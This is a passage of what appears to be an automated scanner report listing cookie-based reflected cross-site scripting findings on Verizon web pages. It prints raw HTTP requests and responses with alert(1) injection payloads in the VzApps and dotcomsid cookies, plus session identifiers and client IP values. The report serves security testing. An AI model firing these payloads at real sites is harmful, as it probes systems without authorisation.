RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 02:56:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXaf320'><script>alert(1)</script>638530528ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF320'><SCRIPT>ALERT(1)</SCRIPT>638530528ED ' />
...[SNIP]...

3.286. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 6357f<script>alert(1)</script>71117283bfe was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX6357f<script>alert(1)</script>71117283bfe; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77952
Expires: Sat, 20 Nov 2010 02:56:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX6357f<script>alert(1)</script>71117283bfe; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6357F<SCRIPT>ALERT(1)</SCRIPT>71117283BFE </DIV>
...[SNIP]...

3.287. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a3b"-alert(1)-"75f87706d4 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=99a3b"-alert(1)-"75f87706d4; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84230
Expires: Sat, 20 Nov 2010 02:56:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "99a3b"-alert(1)-"75f87706d4"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.288. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8583'><script>alert(1)</script>df9eda5005b was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf8583'><script>alert(1)</script>df9eda5005b; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 02:57:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf8583'><script>alert(1)</script>df9eda5005b; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF8583'><SCRIPT>ALERT(1)</SCRIPT>DF9EDA5005B ' />
...[SNIP]...

3.289. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4c88c<script>alert(1)</script>04868af3b9a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX4c88c<script>alert(1)</script>04868af3b9a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; 